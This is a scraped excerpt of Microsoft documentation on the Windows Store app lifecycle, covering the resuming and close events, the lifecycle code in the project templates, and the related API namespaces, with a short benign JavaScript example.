When a suspended app is resumed, it continues from where it left off; no app data is lost, so long as the app was kept in memory. If an app has registered an event handler for the WebUIApplication.resuming event (HTML) or Application.Resuming event (XAML), it is called when the app is resumed from the Suspended state. You can refresh your app content and data using this event handler.
HTML apps usually don't need to handle resuming specifically, because activated fires in the same circumstances. You can use ActivationKind info from the activated event data to determine whether the app is resuming; this pattern is shown in the default.js file for starting project templates.
If a suspended app is activated to participate in an app contract or extension, it receives the Resuming event first, then the activated event. For more info, see "How to resume an app" (HTML or XAML).
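Since in-memory state survives suspension, a resuming handler usually only refreshes content that may have gone stale. A sketch of that pattern (the refresh callback is hypothetical):

```javascript
// Build a resuming handler. Nothing needs to be reloaded from storage,
// because a resumed app still has its in-memory state; the handler just
// refreshes content that may have gone stale while suspended.
function makeResumingHandler(refreshStaleContent) {
  return function onResuming() {
    refreshStaleContent(); // e.g. re-fetch feeds, update clocks
  };
}

// Usage with a counter standing in for real refresh work.
let refreshes = 0;
const onResuming = makeResumingHandler(() => { refreshes += 1; });
onResuming();
```

This is why most apps need little or no resume-specific code: the work is limited to time-sensitive content.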
Note In Windows Phone Store apps, for a XAML app, Windows.
App close
In Windows 8.1 and later, after an app has been closed by the user, the app is removed from the screen and the switch list but not explicitly terminated; whether the app terminates when its final view closes can be controlled with the ApplicationView.TerminateAppOnFinalViewClose property.
If an app has registered an event handler for the suspending event, it is called when the app is closed by Windows or by the user. If you're maintaining a Windows 8 app, note that the handling for ClosedByUser is potentially different than for a Windows 8.1 app.
We recommend that apps not close themselves programmatically unless absolutely necessary. For example, if an app detects a memory leak, it can close itself to ensure the security of the user's personal data. When you close an app programmatically, the system treats this the same as if the app had crashed.
App lifecycle and the Visual Studio project templates
For either HTML or XAML apps, basic code that is relevant for app lifecycle is provided in the starting Visual Studio project templates. The basic app handles launch activation and displays its primary UI even before you've added any of your own code. For more info, see JavaScript project templates for Store apps or C#, VB, and C++ project templates for apps.
Application lifecycle key APIs
- Windows.ApplicationModel namespace
- Windows.ApplicationModel.Activation namespace
- Windows.ApplicationModel.Core namespace
- Windows.UI.WebUI namespace (HTML)
- Windows.UI.Xaml.Application class (XAML)
- Windows.UI.Xaml.Window class (XAML)
- WinJS.Application namespace (HTML)
Related topics | https://msdn.microsoft.com/en-US/library/windows/apps/hh464925.aspx | CC-MAIN-2016-36 | refinedweb | 1,761 | 53.51 |